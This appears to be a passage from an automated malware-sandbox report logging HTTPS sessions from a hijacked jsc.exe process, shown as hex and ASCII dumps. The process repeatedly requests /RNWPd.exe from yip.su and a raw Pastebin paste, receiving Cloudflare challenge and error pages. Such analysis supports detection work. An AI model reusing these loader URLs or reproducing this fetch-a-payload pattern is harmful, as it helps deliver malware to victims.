                                    2024-08-17 22:09:14 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:14 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.549749188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:15 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:15 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:15 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 59 46 65 6a 63 72 7a 7a 67 7a 46 38 4c 42 49 78 37 4e 71 38 74 42 4e 33 54 70 32 4a 49 7a 63 71 76 79 2f 6e 46 43 5a 4b 58 7a 35 71 6d 51 64 72 55 39 4e 61 47 4f 52 41 59 69 4a 6d 72 55 57 69 34 47 6f 73 7a 6d 39 38 74 68 4f 4f 79 59 4d 65 65 47 69 31 52 30 6b 57 69 31 47 74 4c 64 64 5a 42 56 34 77 45 2f 55 53 36 44 41 3d 24 67 61 59 59 52 5a 41 6a 53 4c 75 4e 41 39 2f 56 2b 66 6e 2f 2b 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: YFejcrzzgzF8LBIx7Nq8tBN3Tp2JIzcqvy/nFCZKXz5qmQdrU9NaGORAYiJmrUWi4Goszm98thOOyYMeeGi1R0kWi1GtLddZBV4wE/US6DA=$gaYYRZAjSLuNA9/V+fn/+A==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:15 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:15 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:15 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:15 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:09:15 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:15 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:15 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:09:15 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 33 30 39 33 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 63 63 36 30 66 36 61 63 34 30 32 27 2c 63 48 61 73 68 3a 20 27 66 31 39 35 61 31 32 35 31 63 34 39 64 30 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 54 59 57 71 42 59 55 30 6f 50 66 53 77 66 77 30 45 66 73 45 58 6b 5a 50 6e 39 69 5a 6f 76 71 53 73 59 56 53 76 54 4e 44 5f 78 49 2d 31 37 32 33 39 33 32 35 35 35 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '33093',cRay: '8b4cfcc60f6ac402',cHash: 'f195a1251c49d02',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=TYWqBYU0oPfSwfw0EfsEXkZPn9iZovqSsYVSvTND_xI-1723932555-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:15 UTC1369INData Raw: 6d 4f 50 31 62 47 44 47 56 46 39 6f 56 2e 33 2e 71 54 51 31 61 76 33 76 56 62 76 53 61 58 54 53 64 6d 78 76 31 7a 50 43 49 69 68 62 70 34 52 4f 77 69 73 6d 7a 64 63 2e 30 32 43 54 66 4f 62 74 52 53 4d 74 75 42 51 6c 31 6b 70 48 63 59 7a 42 36 68 47 79 56 4f 6d 79 45 44 4d 4f 52 34 65 63 41 35 31 66 39 57 38 65 6d 42 44 73 73 70 59 4f 46 6e 5f 39 5f 53 42 54 30 54 68 36 35 6a 74 5f 41 64 57 6b 33 41 6b 4d 41 37 5a 4d 4f 66 4d 6b 4b 50 37 39 4d 4c 77 49 38 37 4a 5f 30 4f 5f 78 6e 64 68 55 50 45 61 64 66 49 7a 49 2e 6f 38 53 48 6a 41 4a 75 46 4a 38 32 43 6a 52 66 70 4d 42 37 53 4c 79 42 2e 31 51 6e 39 38 45 74 50 44 64 31 34 45 6e 49 67 47 54 33 4a 59 32 53 68 37 36 51 4d 6d 6e 70 59 44 45 71 62 4d 45 44 52 4a 63 6d 41 69 50 75 44 62 33 5f 69 36 63 57 42 4e
                                    Data Ascii: mOP1bGDGVF9oV.3.qTQ1av3vVbvSaXTSdmxv1zPCIihbp4ROwismzdc.02CTfObtRSMtuBQl1kpHcYzB6hGyVOmyEDMOR4ecA51f9W8emBDsspYOFn_9_SBT0Th65jt_AdWk3AkMA7ZMOfMkKP79MLwI87J_0O_xndhUPEadfIzI.o8SHjAJuFJ82CjRfpMB7SLyB.1Qn98EtPDd14EnIgGT3JY2Sh76QMmnpYDEqbMEDRJcmAiPuDb3_i6cWBN


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.549750104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:20 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:20 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfce60c9b4294-EWR
                                    2024-08-17 22:09:20 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:20 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:09:20 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:20 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.549751188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:20 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:21 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
